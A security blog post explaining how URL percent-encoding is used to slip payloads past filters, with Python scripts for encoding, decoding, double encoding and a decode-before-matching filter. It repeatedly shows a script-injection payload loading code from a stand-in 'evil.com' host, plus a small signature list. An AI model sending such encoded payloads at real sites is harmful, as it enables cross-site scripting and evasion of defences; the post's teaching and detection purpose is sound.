URL Encoding to evade detection and identification with Python
URL encoding has become one of the most common ways for attackers to slip past detection, whether in phishing links or in malicious scripts that trigger unintended downloads (APT campaigns included). The attacker takes advantage of URL encoding to disguise the information carried in a URL/URI.
A server may validate a request and refuse it, so the attacker tries to evade that identification by submitting the same payload in a different encoded form.
A URI (Uniform Resource Identifier) is the means of retrieving a resource by name, by location, or both; it is built from components such as the scheme, domain, port, path and query.
The characters allowed in a URI fall into two classes, “reserved” and “unreserved”. Reserved characters carry a special meaning in certain positions, for example ‘/’ separates path segments and ‘=’ separates a query key from its value. When such a character is meant literally as data rather than as a delimiter, it needs different treatment so that the URI is interpreted correctly and the intended resource is fetched.
As the table above shows, any reserved character can be encoded by writing “%” followed by the character’s ASCII byte value as two hexadecimal digits. For example, the reserved character “+” has the hex value 2B, so it is written as “%” followed by “2B”, giving “%2B”.
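To make that rule concrete, here is a hand-written percent-encoder and decoder as an added example; it is not code from the original post. It applies the “%” plus two-hex-digit rule to every byte that is not in the RFC 3986 unreserved set, cross-checks itself against urllib.parse.quote, and shows what happens when a value is encoded twice (“+” becomes “%2B” and then “%252B”). The function names and the sample strings are my own.

```python
import string
import urllib.parse

# RFC 3986 "unreserved" characters: these are never percent-encoded.
UNRESERVED = frozenset(string.ascii_letters + string.digits + "-._~")


def percent_encode(text: str, safe: str = "") -> str:
    """Percent-encode every byte of the UTF-8 form of `text` that is not
    unreserved (or listed in `safe`). Non-ASCII characters become one %XX
    sequence per UTF-8 byte, which is also what browsers and urllib do."""
    out = []
    for byte in text.encode("utf-8"):
        ch = chr(byte)
        if byte < 0x80 and (ch in UNRESERVED or ch in safe):
            out.append(ch)
        else:
            out.append("%{:02X}".format(byte))  # '%' then the byte as two hex digits
    return "".join(out)


def percent_decode(text: str) -> str:
    """Reverse one layer of percent-encoding. A '%' that is not followed by two
    hex digits (e.g. '100%' or '%G1') is kept literally instead of raising."""
    buf = bytearray()
    i = 0
    while i < len(text):
        if (text[i] == "%" and i + 2 < len(text)
                and all(c in string.hexdigits for c in text[i + 1:i + 3])):
            buf.append(int(text[i + 1:i + 3], 16))
            i += 3
        else:
            buf.extend(text[i].encode("utf-8"))
            i += 1
    return buf.decode("utf-8", errors="replace")


def double_encode(text: str) -> str:
    """Encode twice: the '%' produced by the first pass is itself reserved, so
    it becomes '%25' on the second pass ('+' -> '%2B' -> '%252B'). A filter
    that decodes only once still sees '%2B', not '+'."""
    return percent_encode(percent_encode(text))


def matches_stdlib(text: str) -> bool:
    """Cross-check against urllib.parse.quote with safe='' (same rule set)."""
    return percent_encode(text) == urllib.parse.quote(text, safe="")


if __name__ == "__main__":
    # Constructed samples: a reserved char, a mix of delimiters, a non-ASCII char.
    for sample in ("+", "a b/c=d&e", "é"):
        print(repr(sample), "->", percent_encode(sample), "->", double_encode(sample))
```

The decoder deliberately tolerates malformed sequences, because that is what most servers do as well; a detector that raises on “100%” would be trivially crashed by a hostile request.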
Encoding the values in Python: the following short script encodes a payload using nothing but the standard library, so there is no tool dependency.
import urllib.parse  # standard library, no extra dependency

Url = "http://dummy/getdb.php?data="  # URL to test
Payload = "<script src=\"http://www.evil.com/malicious.js\"></script>"  # payload for testing XSS, SQLi etc.

# safe= lists the ASCII characters that must NOT be quoted. The default is '/';
# passing '' means every reserved character, '/' included, gets encoded.
Encoded_Payload = urllib.parse.quote(Payload, safe='')
Encoded_url = Url + Encoded_Payload  # complete request
print(Encoded_url)  # extend this to write the values to a CSV or to send the request

Output:
http://dummy/getdb.php?data=%3Cscript%20src%3D%22http%3A%2F%2Fwww.evil.com%2Fmalicious.js%22%3E%3C%2Fscript%3E
Python documentation: https://docs.python.org/3/library/urllib.parse.html
Decoding the values in Python: a couple of lines are enough to decode the encoded values.
from urllib.parse import unquote  # unquote() reverses the percent-encoding

Encoded_url = "http://dummy/getdb.php?data=%3Cscript%20src%3D%22http%3A%2F%2Fwww.evil.com%2Fmalicious.js%22%3E%3C%2Fscript%3E"  # encoded value from the script above
Decoded_Payload = unquote(Encoded_url)
print(Decoded_Payload)

Output:
http://dummy/getdb.php?data=<script src="http://www.evil.com/malicious.js"></script>
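The bypass the post opens with (a server that validates the request but only ever sees the encoded form) is easier to reason about with both sides in code. The following is an added example, not code from the post: a naive filter that matches signatures on the raw request string, beside a filter that splits the query and percent-decodes each value to a fixpoint before matching. The signature list, the filter names and the test URLs are constructed for this demonstration, reusing the dummy host and payload from the post.

```python
from urllib.parse import quote, unquote, urlsplit, parse_qs

# Hypothetical signature list for the demonstration; a real WAF has many more rules.
SIGNATURES = ("<script", "javascript:", "onerror=")

# Constructed inputs reusing the dummy host and payload from the post.
BASE = "http://dummy/getdb.php?data="
PAYLOAD = '<script src="http://www.evil.com/malicious.js"></script>'
RAW = BASE + PAYLOAD                                      # not encoded at all
ENCODED = BASE + quote(PAYLOAD, safe="")                  # single encoding, as in the post
DOUBLE = BASE + quote(quote(PAYLOAD, safe=""), safe="")  # '%' -> '%25' on the second pass
BENIGN = BASE + quote("report 2024", safe="")


def naive_filter(url: str) -> bool:
    """Look for signatures in the request exactly as received. Anything that
    is percent-encoded never matches, which is the bypass the post describes."""
    lowered = url.lower()
    return any(sig in lowered for sig in SIGNATURES)


def normalize(value: str, max_rounds: int = 3) -> str:
    """Percent-decode until the value stops changing, with a round limit so a
    hostile input cannot keep the decoder busy indefinitely."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def normalizing_filter(url: str) -> bool:
    """Split the query into parameters, decode each value to a fixpoint, then
    match signatures on the decoded text. parse_qs already strips one layer
    of encoding; normalize() strips any further layers."""
    params = parse_qs(urlsplit(url).query, keep_blank_values=True)
    for values in params.values():
        for value in values:
            if any(sig in normalize(value).lower() for sig in SIGNATURES):
                return True
    return False


def compare(url: str) -> dict:
    """Verdict of both filters for one request, for a quick side-by-side."""
    return {"naive": naive_filter(url), "normalizing": normalizing_filter(url)}


if __name__ == "__main__":
    for name, url in (("raw", RAW), ("encoded", ENCODED),
                      ("double", DOUBLE), ("benign", BENIGN)):
        print(f"{name:8s} {compare(url)}")
```

Two caveats a practitioner should keep in mind: the filter should decode the same number of layers the backend application does, since decoding more layers than the application will produce false positives and fewer will produce misses; and the same normalization belongs in log analysis, because a request that was stored percent-encoded is invisible to a plain text search for “<script”.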
You may use any number of tools to achieve the same result, but my intent in this write-up is to explain URL encoding and decoding in the simplest possible way using Python.
Please feel free to reach out in case of any queries.
~AshishSecDev~